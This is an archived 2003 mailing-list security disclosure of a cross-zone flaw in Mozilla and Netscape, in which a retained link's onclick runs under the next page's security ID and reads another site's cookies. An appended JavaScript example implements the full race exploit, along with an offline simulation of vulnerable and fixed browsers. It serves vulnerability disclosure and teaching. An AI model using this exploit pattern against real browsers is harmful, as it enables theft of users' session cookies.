i cracked restriction of 'zone' in mozilla.

From: Liu Die Yu (liudieyuinchinaat_private)
Date: Tue Apr 15 2003 - 20:28:52 PDT


    i cracked restriction of 'zone' in mozilla.
    ("that's all" is the end of file if you are in a hurry)
    
    [tested]
    OS:"Windows Server 2003"
    
    NETSCAPE Ver String: "Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; 
    rv:1.0.1) Gecko/20020823 Netscape/7.0 "
    (downloaded on "2003/3/31 UTC+800")
    MOZILLA Ver String: "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; 
    rv:1.3) Gecko/20030312"
    (downloaded on "2003/4/1 UTC+800")
    MOZILLA Ver String: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; 
    rv:1.4a) Gecko/20030401"
    (downloaded on "2003/4/15 UTC+800")
    
    [demo]
    http://liudieyuinchina.vip.sina.com/EdgeLink/EdgeLink-MyPage.htm
    or
    UMBRELLA.MX.TC ===> EdgeLink-MyPage section.
    (disable Popup killer.)
    
    [exp]
    Mozilla does not wash links at the edge of the transition from one document 
    to another.
    
    {0} Before the content of the next document is loaded and after the security ID 
    of the current document has been changed to the security ID of the next one (such 
    a period exists):
    
    {1} links in the current document, including their "onclick" property, remain 
    alive (= clickable).
    {1.1} I can access my link if I have a reference to it.
    Now I call its "onclick" via the reference to the link:
    {1.2} "onclick" is executed with the security ID of the next page, which is 
    about to be loaded.
    (boring? "[demo-exp]" is easier.)
    
    [demo-exp]
    okay, this is easier. listen up:
    
    task:
    show "document.cookie" at "www.securityfocus.com", via "window.alert".
    
    [*] our "LINK" page: it is in our 'zone' and contains a link with 
    onclick="alert(document.cookie)"
    
    [*] the "main" script lives in another page; 
    now the "main" script plays the trick:
    open the "LINK" page in another window, "mywin".
    save a reference to the link in the "LINK" page in the "MyLink" variable.
    tell "mywin" to go to "http://www.securityfocus.com/".
    wait until the security ID changes
    ("security ID changes" <==> "main script is unable to get protected info" --
    > "try{[get protected info in mywin]}catch{[now the security ID has 
    changed.]}" )
    
    call "MyLink.onclick()" *immediately*.
    /*
    we call it immediately, so the time is {0} (refer to "{0}" in "[exp]");
    even though the security ID has been changed to that 
    of "http://www.securityfocus.com", our link remains alive. {1}
    even though the security ID is the victim's ID, the main script can still 
    call "MyLink.onclick()". {1.1}
    at last, {1.2}
    */
    
    
    
    that's all.
    
    
    
    [how]
    from small beginnings come great things!
    read:
    
    http://liudieyuinchina.vip.sina.com/EdgeLink/EdgeLink-How.htm
    or
    UMBRELLA.MX.TC ===> EdgeLink-How section.
    
    if you are interested in how I got this within 5 hours of downloading 
    Mozilla.
    
    [people]
    greetings to you all!
    and thanx to
    "the Pull", dror, bin, gean, dross, iainm, and always: mom and dad - for 
    their help.
    
    [extra offer]
    if you browse the web daily with MSIE, try:
    
    http://liudieyuinchina.vip.sina.com/domex/aPoP
    or
    DOMEX.INT.TC ===> aPoP section.
    
    (it's coded by me; i hope you like it :-) )
    BTW, I'm very proud of my "PuriWeb" function in it.
    
    
    -----
    all mentioned resources can always be found at UMBRELLA.MX.TC
    
    [contact]
    UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
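The sequence in "[demo-exp]" above, written out as an added example that is not part of the original post and not the author's EdgeLink demo code. It keeps a reference to a link from the attacker-controlled page, navigates the window to the victim, polls a protected property in try/catch until the read starts throwing (the "security ID changes" test from the post), and fires the retained onclick at once. The names LINK_PAGE, sameOriginWith, makeEdgeLink, runEdgeLink, runEdgeLinkSync and makeFakeWindow are this example's own; the stand-in window and its cookie values are constructed here so the timing logic runs offline in Node, with a "vulnerable" mode that models the behaviour the post describes and a "fixed" mode that models a browser keeping the handler bound to the principal it was created under.

```javascript
// Added example, not the original post's code. Models the EdgeLink race.
const LINK_PAGE = 'http://attacker.example/EdgeLink-Link.htm'; // assumed URL
const VICTIM_URL = 'http://www.securityfocus.com/';           // target named in the post

// Probe from the post: a protected read (document.cookie) succeeds while the
// window still carries our security ID and throws once it carries the victim's.
function sameOriginWith(win) {
  try {
    void win.document.cookie;
    return true;
  } catch (e) {
    return false; // security ID has changed
  }
}

// Hold the link reference ({1.1}), start the navigation, and return a step()
// that performs one poll. step() returns null while we are still same-origin,
// otherwise fires the retained onclick ({1.2}) and returns its result.
function makeEdgeLink(win) {
  const myLink = win.document.links[0];
  win.location.assign(VICTIM_URL);
  let polls = 0;
  return function step() {
    polls++;
    if (sameOriginWith(win)) return null;
    return { polls, result: myLink.onclick() }; // called *immediately* after the flip
  };
}

// Browser driver: a real navigation only progresses between tasks, so poll on
// a timer rather than in a tight loop. 'win' would be window.open(LINK_PAGE).
function runEdgeLink(win, onDone, intervalMs = 1) {
  const step = makeEdgeLink(win);
  const timer = setInterval(() => {
    const r = step();
    if (r) { clearInterval(timer); onDone(r); }
  }, intervalMs);
}

// Synchronous driver for the stand-in window below (offline runs).
function runEdgeLinkSync(win, maxPolls = 100) {
  const step = makeEdgeLink(win);
  for (let i = 0; i < maxPolls; i++) {
    const r = step();
    if (r) return r;
  }
  return null;
}

// Constructed stand-in for a browser window. Its security ID flips to the
// victim's on the settleAfter-th protected read after navigation starts.
// vulnerable=true: the retained onclick runs under the window's *current*
// principal (the behaviour the post describes); vulnerable=false: the handler
// stays bound to the principal it was created under.
function makeFakeWindow({ vulnerable, settleAfter = 3 }) {
  const cookies = { attacker: 'session=attacker', victim: 'session=victim' }; // constructed
  const handlerPrincipal = 'attacker';
  let principal = 'attacker';
  let navigating = false;
  let reads = 0;
  return {
    location: { assign() { navigating = true; } },
    document: {
      get cookie() {
        if (navigating && ++reads >= settleAfter) principal = 'victim';
        if (principal !== 'attacker') throw new Error('SecurityError: permission denied');
        return cookies[principal];
      },
      links: [{
        // alert(document.cookie) from the LINK page, returning the value instead
        onclick() { return cookies[vulnerable ? principal : handlerPrincipal]; }
      }]
    }
  };
}

if (typeof window === 'undefined') {
  console.log('vulnerable model:', runEdgeLinkSync(makeFakeWindow({ vulnerable: true })));
  console.log('fixed model:     ', runEdgeLinkSync(makeFakeWindow({ vulnerable: false })));
}
```

The only difference between the two models is which principal the retained handler executes under; the polling logic is identical, which is the point of the post: an attacker does not need to win a narrow race, only to notice the moment the protected read starts failing and call the handler right then. A browser is only safe here if handlers created under the old document cannot run with the new document's security ID at all.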
    



    This archive was generated by hypermail 2b30 : Wed Apr 16 2003 - 06:13:29 PDT